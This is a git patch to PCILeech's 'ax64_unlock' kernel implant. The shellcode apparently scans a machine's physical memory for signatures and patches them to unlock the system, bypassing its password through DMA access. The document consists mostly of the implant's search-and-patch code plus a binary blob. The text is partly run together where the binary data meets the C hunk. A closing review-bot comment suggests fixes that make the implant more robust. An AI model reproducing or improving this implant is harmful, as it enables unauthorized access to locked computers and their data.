From 30da690e6a05aa0606cbc34f414a29bdb2a40fac Mon Sep 17 00:00:00 2001
From: ufrisk
Date: Sat, 3 Sep 2016 00:07:17 +0200
Subject: [PATCH] implant: minor fixes [ax64_unlock]
---
 pcileech_files/ax64_unlock.ksh | Bin 1949 -> 1933 bytes
 pcileech_shellcode/ax64_common.h | 3 ++
 pcileech_shellcode/ax64_unlock.c | 46 +++++++++++++++----------------
 3 files changed, 25 insertions(+), 24 deletions(-)
diff --git a/pcileech_files/ax64_unlock.ksh b/pcileech_files/ax64_unlock.ksh index 888c6cb258db2a5d054713191a765b43d6c0f13e..7980c7fe0fc44ac73a8aa0d6ffe5b44c0dfa93a4 100644 GIT binary patch delta 638 zcmZ8eOK1~O6rD*Xt<=^;MNtYe>ImIgh?sy1dDOri97?376_VD4rMOTRX(ED!Sf)YK z%P1u)5%+>Ct+a_q3`F9uv;jY{sJQSq)u=6~wMg^4FLCADJl;9yo^$Vg*W8x-fNx`U zf2{9J$H(FMh_!Oso@%}wdGe>DwBeKTVWD=pS~=zFmZiqI>T2A3H#P3T3AS@0q^#=& z`~l|sMKG(Xef(z3C+|MO!mO9|0aghNc?%DMd?5>Eb7i8<$dh&LbSWdu(v#2M@=K__G!w!}cGgEXK@P+Ui zq9;WwDIRy-6C8||M4@h0<-`pbEfOT_``*OHbiCxD;aIj#W5qsO<9zvTdtte}tBLwH ztf&^!G2+*8IH2P>(D5BR#s-+HpGEtNnQcmY()$bWGwmvvdK6FU)=>w;m2u}-A%4O= z-BUBHE}2sNlmgD@2i;Q-ZNAF6*c*&@wUSIFSqsV9{*%4@C)-Z^X5zO}@u4kbLb?Fi z+0!J*%ZJ5$W>Ew4yPUWP7}Ywl1Q^!>fG0IS;D`ob-dEW`ab_maBfcHXoJwnv0p}AQ j`#RZR0n(;Q`~1?HRWfZ#*s*qXa!}bL%a13oxD>}4hMo~fV)FfUkMBPSd zA1jm`B8Z3=FP@}g(g zYp*RFkSUyD#kGWv=MUlZ!dcA56(! zZ2eMP>*M$q@R|ld35NhDv~ys-R{1C&;qgkXR_hxU6M{J>-k1S?N(Y?#chunk[0].cb || SysVCall(pk->fn.memcmp, pb + ps->chunk[0].cbOffset, ps->chunk[0].pb, (QWORD)ps->chunk[0].cb)) { - continue; - } - if(ps->chunk[1].cb && SysVCall(pk->fn.memcmp, pb + ps->chunk[1].cbOffset, ps->chunk[1].pb, (QWORD)ps->chunk[1].cb)) { - continue; - } - SysVCall(pk->fn.memcpy, pb + ps->chunk[2].cbOffset, ps->chunk[2].pb, (QWORD)ps->chunk[2].cb); - result = TRUE; + for(i = 0; i < cSignatures; i++) { + ps = pSignatures + i; + if(!ps->chunk[0].cb || SysVCall(pk->fn.memcmp, pbPage + ps->chunk[0].cbOffset, ps->chunk[0].pb, (QWORD)ps->chunk[0].cb)) { + continue; } + if(ps->chunk[1].cb && SysVCall(pk->fn.memcmp, pbPage + ps->chunk[1].cbOffset, ps->chunk[1].pb, (QWORD)ps->chunk[1].cb)) { + continue; + } + SysVCall(pk->fn.memcpy, pbPage + ps->chunk[2].cbOffset, ps->chunk[2].pb, (QWORD)ps->chunk[2].cb); + result = TRUE; } return result; } 
@@ -63,26 +59,28 @@ STATUS Unlock(PKMDDATA pk)
 },
 };
 PBYTE pbMemoryMap;
- QWORD cbMemoryMap, qwBaseAddress, qwMemoryAddressMax;
+ QWORD cbMemoryMap, qwBaseAddress, qwMemoryAddressMax, o;
 BOOL result = FALSE;
 // 1: Retrieve physical memory map
 pbMemoryMap = (PBYTE)SysVCall(pk->fn.IOMalloc, 4096);
 if(!pbMemoryMap) {
- return STATUS_FAIL_BASE | 2;
+ return STATUS_FAIL_OUTOFMEMORY;
 }
 if(!GetMemoryMap(pk, pbMemoryMap, &cbMemoryMap)) {
- return STATUS_FAIL_BASE | 3;
+ return STATUS_FAIL_MEMORYMAP_NOT_FOUND;
 }
 qwMemoryAddressMax = GetMemoryPhysicalMaxAddress(pbMemoryMap, cbMemoryMap);
 // 2: Search for the memory signature and patch it.
- for(qwBaseAddress = 0; qwBaseAddress < qwMemoryAddressMax; qwBaseAddress += 0x100000) {
- if(IsRangeInPhysicalMap(pbMemoryMap, cbMemoryMap, qwBaseAddress, 0x100000)) {
- MapMemoryPhysical(pk, qwBaseAddress);
- result = Unlock_FindAndPatch(pk, (PBYTE)VM_MIN_PHYSICALMAPPING_ADDRESS, 0x100, oSigs, NUMBER_OF_SIGNATURES) || result;
+ for(qwBaseAddress = 0; qwBaseAddress < qwMemoryAddressMax; qwBaseAddress += 0x01000000) {
+ MapMemoryPhysical(pk, qwBaseAddress);
+ for(o = 0; o < 0x01000000; o += 0x1000) {
+ if(IsRangeInPhysicalMap(pbMemoryMap, cbMemoryMap, qwBaseAddress + o, 0x1000)) {
+ result = Unlock_FindAndPatch(pk, (PBYTE)(VM_MIN_PHYSICALMAPPING_ADDRESS + o), oSigs, NUMBER_OF_SIGNATURES) || result;
+ }
 }
 }
 SysVCall(pk->fn.IOFree, pbMemoryMap, 4096);
- return result ? STATUS_SUCCESS : STATUS_FAIL_BASE | 4;
+ return result ? STATUS_SUCCESS : STATUS_FAIL_SIGNATURE_NOT_FOUND;
 }
 VOID c_EntryPoint(PKMDDATA pk)
@@ -90,6 +88,6 @@ VOID c_EntryPoint(PKMDDATA pk)
 if(pk->dataIn[0] == 1) {
 pk->dataOut[0] = Unlock(pk);
 } else {
- pk->dataOut[0] = STATUS_FAIL_BASE | 1;
+ pk->dataOut[0] = STATUS_FAIL_INPPARAMS_BAD;
 }
 }
\ No newline at end of file
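Review bot: The `if(!GetMemoryMap(...))` early return, whose status code this hunk changes to `STATUS_FAIL_MEMORYMAP_NOT_FOUND`, still leaks the 4096-byte buffer obtained from `pk->fn.IOMalloc` a few lines above; only the success path reaches `SysVCall(pk->fn.IOFree, pbMemoryMap, 4096)`. Releasing it before returning keeps the two exit paths symmetric: `SysVCall(pk->fn.IOFree, pbMemoryMap, 4096); return STATUS_FAIL_MEMORYMAP_NOT_FOUND;`. Separately, the rewritten loop now calls `MapMemoryPhysical(pk, qwBaseAddress)` for every 16 MiB window, including windows containing no page from the physical map, whereas the old code mapped only ranges that passed `IsRangeInPhysicalMap`; if the mapping is not free, testing the window before mapping avoids the wasted work. Note also that the per-page `IsRangeInPhysicalMap(..., 0x1000)` check validates only the single page handed to `Unlock_FindAndPatch`, so a signature whose chunk offset plus length crosses the page end would be compared against an unvalidated neighbour — presumably the offsets are small, but a comment stating that assumption, e.g. `// signature chunks are assumed to lie within one 4 KiB page`, would make the invariant explicit.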